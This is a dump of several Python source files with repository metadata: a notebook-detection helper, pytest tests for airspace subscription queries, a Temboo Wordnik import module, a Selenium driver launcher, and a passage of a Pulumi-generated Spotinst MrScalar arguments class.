2022-03-30T07:43:41.000Z
|
graphgallery/utils/ipynb.py
|
EdisonLeeeee/GraphGallery
|
4eec9c5136bda14809bd22584b26cc346cdb633b
|
[
"MIT"
] | 5
|
2020-11-05T06:16:50.000Z
|
2021-12-11T05:05:22.000Z
|
graphgallery/utils/ipynb.py
|
EdisonLeeeee/GraphGallery
|
4eec9c5136bda14809bd22584b26cc346cdb633b
|
[
"MIT"
] | 51
|
2020-09-23T15:37:12.000Z
|
2022-03-05T01:28:56.000Z
|
from IPython import get_ipython
from IPython.display import display
def is_ipynb():
    """Return True when the active IPython shell is a notebook kernel.

    Detection: the class of the object returned by ``get_ipython()`` is
    implemented in an ``ipykernel.*`` module.
    """
    shell_class = type(get_ipython())
    return shell_class.__module__.startswith('ipykernel.')
| 21.857143
| 66
| 0.784314
| 20
| 153
| 5.65
| 0.65
| 0.19469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 153
| 6
| 67
| 25.5
| 0.837037
| 0
| 0
| 0
| 0
| 0
| 0.065359
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d55427688a084bec0e9255b152935a5e5812cfae
| 8,526
|
py
|
Python
|
monitoring/prober/scd/test_subscription_queries.py
|
rpai1/dss
|
79d8110c336851b155a6e5417692ec68b70c0c07
|
[
"Apache-2.0"
] | 1
|
2021-03-06T19:31:04.000Z
|
2021-03-06T19:31:04.000Z
|
monitoring/prober/scd/test_subscription_queries.py
|
rpai1/dss
|
79d8110c336851b155a6e5417692ec68b70c0c07
|
[
"Apache-2.0"
] | null | null | null |
monitoring/prober/scd/test_subscription_queries.py
|
rpai1/dss
|
79d8110c336851b155a6e5417692ec68b70c0c07
|
[
"Apache-2.0"
] | 1
|
2020-09-20T22:15:36.000Z
|
2020-09-20T22:15:36.000Z
|
"""Strategic conflict detection Subscription query tests:
- add a few Subscriptions spaced in time and footprints
- query with various combinations of arguments
"""
import datetime
from monitoring.monitorlib.infrastructure import default_scope
from monitoring.monitorlib import scd
from monitoring.monitorlib.scd import SCOPE_SC
SUB1_ID = '00000088-b268-481c-a32d-6be442000000'
SUB2_ID = '00000017-a3fe-42d6-9f3b-83dec2000000'
SUB3_ID = '0000001b-9c8a-475e-a82d-d81922000000'
LAT0 = 23
LNG0 = 56
# This value should be large enough to ensure areas separated by this distance
# will lie in separate grid cells.
FOOTPRINT_SPACING_M = 10000
def _make_sub1_req():
    """Request body for Subscription 1: altitude 0-300, footprint offset
    south of (LAT0, LNG0) by FOOTPRINT_SPACING_M, ending 60 min from now.

    NOTE(review): time_start is computed but the volume passes None as the
    start (unlike subs 2 and 3) — presumably to exercise an open-ended
    start time; confirm this is intentional.
    """
    time_start = datetime.datetime.utcnow()
    time_end = time_start + datetime.timedelta(minutes=60)
    lat = LAT0 - scd.latitude_degrees(FOOTPRINT_SPACING_M)
    return {
        "extents": scd.make_vol4(None, time_end, 0, 300, scd.make_circle(lat, LNG0, 100)),
        "old_version": 0,
        "uss_base_url": "https://example.com/foo",
        "notify_for_operations": True,
        "notify_for_constraints": False
    }
def _make_sub2_req():
    """Request body for Subscription 2: starts 2 h from now for 60 min,
    altitude 350-650, footprint centered exactly on (LAT0, LNG0)."""
    time_start = datetime.datetime.utcnow() + datetime.timedelta(hours=2)
    time_end = time_start + datetime.timedelta(minutes=60)
    return {
        "extents": scd.make_vol4(time_start, time_end, 350, 650, scd.make_circle(LAT0, LNG0, 100)),
        "old_version": 0,
        "uss_base_url": "https://example.com/foo",
        "notify_for_operations": True,
        "notify_for_constraints": False
    }
def _make_sub3_req():
    """Request body for Subscription 3: starts 4 h from now for 60 min,
    altitude 700-1000, footprint offset north of (LAT0, LNG0)."""
    time_start = datetime.datetime.utcnow() + datetime.timedelta(hours=4)
    time_end = time_start + datetime.timedelta(minutes=60)
    lat = LAT0 + scd.latitude_degrees(FOOTPRINT_SPACING_M)
    return {
        "extents": scd.make_vol4(time_start, time_end, 700, 1000, scd.make_circle(lat, LNG0, 100)),
        "old_version": 0,
        "uss_base_url": "https://example.com/foo",
        "notify_for_operations": True,
        "notify_for_constraints": False
    }
def test_ensure_clean_workspace(scd_session):
    """Delete any of the three named Subscriptions left over from a
    previous run so later tests start from a known-clean state."""
    for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
        resp = scd_session.get('/subscriptions/{}'.format(sub_id), scope=SCOPE_SC)
        if resp.status_code == 200:
            # Subscription exists: remove it.
            resp = scd_session.delete('/subscriptions/{}'.format(sub_id), scope=SCOPE_SC)
            assert resp.status_code == 200, resp.content
        elif resp.status_code == 404:
            # As expected.
            pass
        else:
            # Any other status indicates a broken environment.
            assert False, resp.content
# Preconditions: No named Subscriptions exist
# Mutations: None
@default_scope(SCOPE_SC)
def test_subs_do_not_exist_get(scd_session):
    """Each named Subscription should 404 before any has been created."""
    for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
        resp = scd_session.get('/subscriptions/{}'.format(sub_id))
        assert resp.status_code == 404, resp.content
# Preconditions: No named Subscriptions exist
# Mutations: None
@default_scope(SCOPE_SC)
def test_subs_do_not_exist_query(scd_session):
    """A query covering the whole test area should return none of the
    three named Subscriptions before they are created."""
    resp = scd_session.post('/subscriptions/query', json={
        'area_of_interest': scd.make_vol4(None, None, 0, 5000, scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
    })
    assert resp.status_code == 200, resp.content
    result_ids = [x['id'] for x in resp.json()['subscriptions']]
    for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
        assert sub_id not in result_ids
# Preconditions: No named Subscriptions exist
# Mutations: Subscriptions 1, 2, and 3 created
@default_scope(SCOPE_SC)
def test_create_subs(scd_session):
    """Create Subscriptions 1, 2 and 3 used by the query tests below."""
    resp = scd_session.put('/subscriptions/{}'.format(SUB1_ID), json=_make_sub1_req())
    assert resp.status_code == 200, resp.content
    resp = scd_session.put('/subscriptions/{}'.format(SUB2_ID), json=_make_sub2_req())
    assert resp.status_code == 200, resp.content
    resp = scd_session.put('/subscriptions/{}'.format(SUB3_ID), json=_make_sub3_req())
    assert resp.status_code == 200, resp.content
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: None
@default_scope(SCOPE_SC)
def test_search_find_all_subs(scd_session):
    """A broad query (no time bounds, 0-3000 altitude, wide circle)
    should find all three Subscriptions."""
    resp = scd_session.post(
        '/subscriptions/query',
        json={
            "area_of_interest": scd.make_vol4(None, None, 0, 3000,
                                              scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
        })
    assert resp.status_code == 200, resp.content
    result_ids = [x['id'] for x in resp.json()['subscriptions']]
    for sub_id in (SUB1_ID, SUB2_ID, SUB3_ID):
        assert sub_id in result_ids
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: None
@default_scope(SCOPE_SC)
def test_search_footprint(scd_session):
    """Queries with a small (50 m) footprint should discriminate between
    Subscriptions by location: a circle at Sub 1's offset center matches
    only Sub 1, and a circle at (LAT0, LNG0) matches only Sub 2.
    """
    # Same southward offset used when Subscription 1 was created.
    lat = LAT0 - scd.latitude_degrees(FOOTPRINT_SPACING_M)
    resp = scd_session.post(
        '/subscriptions/query',
        json={
            "area_of_interest": scd.make_vol4(None, None, 0, 3000,
                                              scd.make_circle(lat, LNG0, 50))
        })
    assert resp.status_code == 200, resp.content
    result_ids = [x['id'] for x in resp.json()['subscriptions']]
    assert SUB1_ID in result_ids
    assert SUB2_ID not in result_ids
    assert SUB3_ID not in result_ids
    resp = scd_session.post(
        '/subscriptions/query',
        json={
            "area_of_interest": scd.make_vol4(None, None, 0, 3000,
                                              scd.make_circle(LAT0, LNG0, 50))
        })
    assert resp.status_code == 200, resp.content
    result_ids = [x['id'] for x in resp.json()['subscriptions']]
    assert SUB1_ID not in result_ids
    assert SUB2_ID in result_ids
    assert SUB3_ID not in result_ids
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: None
@default_scope(SCOPE_SC)
def test_search_time(scd_session):
  """Query by time window over the full footprint.

  Windows starting now (with or without a start bound) should match only
  Subscription 1; windows starting four hours from now (closed or
  open-ended) should match only Subscription 3.
  """
  def _query_ids(time_start, time_end):
    # One footprint-wide query for the given time window; returns matched ids.
    resp = scd_session.post(
      '/subscriptions/query',
      json={
        "area_of_interest": scd.make_vol4(time_start, time_end, 0, 3000,
                                          scd.make_circle(LAT0, LNG0, FOOTPRINT_SPACING_M))
      })
    assert resp.status_code == 200, resp.content
    return [x['id'] for x in resp.json()['subscriptions']]

  time_start = datetime.datetime.utcnow()
  time_end = time_start + datetime.timedelta(minutes=1)

  # Closed window starting now: only Subscription 1 is active.
  result_ids = _query_ids(time_start, time_end)
  assert SUB1_ID in result_ids
  assert SUB2_ID not in result_ids
  assert SUB3_ID not in result_ids

  # Open-start window ending one minute from now: same result.
  result_ids = _query_ids(None, time_end)
  assert SUB1_ID in result_ids
  assert SUB2_ID not in result_ids
  assert SUB3_ID not in result_ids

  time_start = datetime.datetime.utcnow() + datetime.timedelta(hours=4)
  time_end = time_start + datetime.timedelta(minutes=1)

  # Closed window four hours out: only Subscription 3 is active.
  result_ids = _query_ids(time_start, time_end)
  assert SUB1_ID not in result_ids
  assert SUB2_ID not in result_ids
  assert SUB3_ID in result_ids

  # Open-ended window starting four hours out: same result.
  result_ids = _query_ids(time_start, None)
  assert SUB1_ID not in result_ids
  assert SUB2_ID not in result_ids
  assert SUB3_ID in result_ids
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: None
@default_scope(SCOPE_SC)
def test_search_time_footprint(scd_session):
  """A query bounded in both time and footprint should match only Subscription 2."""
  window_start = datetime.datetime.utcnow()
  window_end = window_start + datetime.timedelta(hours=2.5)
  query_lat = LAT0 + scd.latitude_degrees(FOOTPRINT_SPACING_M)
  area = scd.make_vol4(window_start, window_end, 0, 3000,
                       scd.make_circle(query_lat, LNG0, FOOTPRINT_SPACING_M))
  resp = scd_session.post('/subscriptions/query', json={"area_of_interest": area})
  assert resp.status_code == 200, resp.content
  matched_ids = [sub['id'] for sub in resp.json()['subscriptions']]
  assert SUB1_ID not in matched_ids
  assert SUB2_ID in matched_ids
  assert SUB3_ID not in matched_ids
# Preconditions: Subscriptions 1, 2, and 3 created
# Mutations: Subscriptions 1, 2, and 3 deleted
@default_scope(SCOPE_SC)
def test_delete_subs(scd_session):
  """Delete all three Subscriptions; each DELETE must succeed."""
  for sub_id in [SUB1_ID, SUB2_ID, SUB3_ID]:
    del_resp = scd_session.delete('/subscriptions/{}'.format(sub_id))
    assert del_resp.status_code == 200, del_resp.content
| 34.518219
| 108
| 0.700563
| 1,222
| 8,526
| 4.630115
| 0.135843
| 0.050901
| 0.044715
| 0.045069
| 0.86444
| 0.858431
| 0.820431
| 0.804525
| 0.755567
| 0.735242
| 0
| 0.047887
| 0.18684
| 8,526
| 246
| 109
| 34.658537
| 0.76821
| 0.099109
| 0
| 0.710383
| 0
| 0
| 0.127287
| 0.030972
| 0
| 0
| 0
| 0
| 0.213115
| 1
| 0.065574
| false
| 0.005464
| 0.021858
| 0
| 0.103825
| 0.016393
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5837ed5c9e1f4853a3b61828f36313098836798
| 571
|
py
|
Python
|
temboo/core/Library/Wordnik/Account/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Wordnik/Account/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Wordnik/Account/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Wordnik.Account.GetAuthToken import GetAuthToken, GetAuthTokenInputSet, GetAuthTokenResultSet, GetAuthTokenChoreographyExecution
from temboo.Library.Wordnik.Account.GetKeyStatus import GetKeyStatus, GetKeyStatusInputSet, GetKeyStatusResultSet, GetKeyStatusChoreographyExecution
from temboo.Library.Wordnik.Account.GetUser import GetUser, GetUserInputSet, GetUserResultSet, GetUserChoreographyExecution
from temboo.Library.Wordnik.Account.GetWordLists import GetWordLists, GetWordListsInputSet, GetWordListsResultSet, GetWordListsChoreographyExecution
| 114.2
| 148
| 0.901926
| 44
| 571
| 11.704545
| 0.5
| 0.07767
| 0.132039
| 0.186408
| 0.240777
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.049037
| 571
| 4
| 149
| 142.75
| 0.948435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d5a4573d5ae49df24e84bfdf833cc441272c4eb6
| 176
|
py
|
Python
|
services/startDriver.py
|
nayfaan/Google_rank_find
|
77815b0f710ec4456f70a63b3359c02fd24753a8
|
[
"MIT"
] | null | null | null |
services/startDriver.py
|
nayfaan/Google_rank_find
|
77815b0f710ec4456f70a63b3359c02fd24753a8
|
[
"MIT"
] | null | null | null |
services/startDriver.py
|
nayfaan/Google_rank_find
|
77815b0f710ec4456f70a63b3359c02fd24753a8
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
from selenium import *
def start():
    """Launch and return a Chrome WebDriver using the bundled chromedriver binary."""
    driver_path = './services/chromedriver'
    return webdriver.Chrome(executable_path=driver_path)
if __name__ == "__main__":
    # No standalone behavior; this module is meant to be imported for start().
    pass
| 19.555556
| 70
| 0.744318
| 20
| 176
| 6.1
| 0.8
| 0.196721
| 0.295082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153409
| 176
| 8
| 71
| 22
| 0.818792
| 0
| 0
| 0
| 0
| 0
| 0.176136
| 0.130682
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0.166667
| 0.333333
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
|
0
| 8
|
635cce5473f8750091e7f18d6db45331eaca5c07
| 174,251
|
py
|
Python
|
sdk/python/pulumi_spotinst/aws/mr_scalar.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2019-12-21T20:50:43.000Z
|
2021-12-01T20:57:38.000Z
|
sdk/python/pulumi_spotinst/aws/mr_scalar.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | 103
|
2019-12-09T22:03:16.000Z
|
2022-03-30T17:07:34.000Z
|
sdk/python/pulumi_spotinst/aws/mr_scalar.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MrScalarArgs', 'MrScalar']
@pulumi.input_type
class MrScalarArgs:
def __init__(__self__, *,
strategy: pulumi.Input[str],
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a MrScalar resource.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]] steps_files: Steps from S3.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
pulumi.set(__self__, "strategy", strategy)
if additional_info is not None:
pulumi.set(__self__, "additional_info", additional_info)
if additional_primary_security_groups is not None:
pulumi.set(__self__, "additional_primary_security_groups", additional_primary_security_groups)
if additional_replica_security_groups is not None:
pulumi.set(__self__, "additional_replica_security_groups", additional_replica_security_groups)
if applications is not None:
pulumi.set(__self__, "applications", applications)
if availability_zones is not None:
pulumi.set(__self__, "availability_zones", availability_zones)
if bootstrap_actions_files is not None:
pulumi.set(__self__, "bootstrap_actions_files", bootstrap_actions_files)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if configurations_files is not None:
pulumi.set(__self__, "configurations_files", configurations_files)
if core_desired_capacity is not None:
pulumi.set(__self__, "core_desired_capacity", core_desired_capacity)
if core_ebs_block_devices is not None:
pulumi.set(__self__, "core_ebs_block_devices", core_ebs_block_devices)
if core_ebs_optimized is not None:
pulumi.set(__self__, "core_ebs_optimized", core_ebs_optimized)
if core_instance_types is not None:
pulumi.set(__self__, "core_instance_types", core_instance_types)
if core_lifecycle is not None:
pulumi.set(__self__, "core_lifecycle", core_lifecycle)
if core_max_size is not None:
pulumi.set(__self__, "core_max_size", core_max_size)
if core_min_size is not None:
pulumi.set(__self__, "core_min_size", core_min_size)
if core_scaling_down_policies is not None:
pulumi.set(__self__, "core_scaling_down_policies", core_scaling_down_policies)
if core_scaling_up_policies is not None:
pulumi.set(__self__, "core_scaling_up_policies", core_scaling_up_policies)
if core_unit is not None:
pulumi.set(__self__, "core_unit", core_unit)
if custom_ami_id is not None:
pulumi.set(__self__, "custom_ami_id", custom_ami_id)
if description is not None:
pulumi.set(__self__, "description", description)
if ebs_root_volume_size is not None:
pulumi.set(__self__, "ebs_root_volume_size", ebs_root_volume_size)
if ec2_key_name is not None:
pulumi.set(__self__, "ec2_key_name", ec2_key_name)
if expose_cluster_id is not None:
pulumi.set(__self__, "expose_cluster_id", expose_cluster_id)
if instance_weights is not None:
pulumi.set(__self__, "instance_weights", instance_weights)
if job_flow_role is not None:
pulumi.set(__self__, "job_flow_role", job_flow_role)
if keep_job_flow_alive is not None:
pulumi.set(__self__, "keep_job_flow_alive", keep_job_flow_alive)
if log_uri is not None:
pulumi.set(__self__, "log_uri", log_uri)
if managed_primary_security_group is not None:
pulumi.set(__self__, "managed_primary_security_group", managed_primary_security_group)
if managed_replica_security_group is not None:
pulumi.set(__self__, "managed_replica_security_group", managed_replica_security_group)
if master_ebs_block_devices is not None:
pulumi.set(__self__, "master_ebs_block_devices", master_ebs_block_devices)
if master_ebs_optimized is not None:
pulumi.set(__self__, "master_ebs_optimized", master_ebs_optimized)
if master_instance_types is not None:
pulumi.set(__self__, "master_instance_types", master_instance_types)
if master_lifecycle is not None:
pulumi.set(__self__, "master_lifecycle", master_lifecycle)
if master_target is not None:
pulumi.set(__self__, "master_target", master_target)
if name is not None:
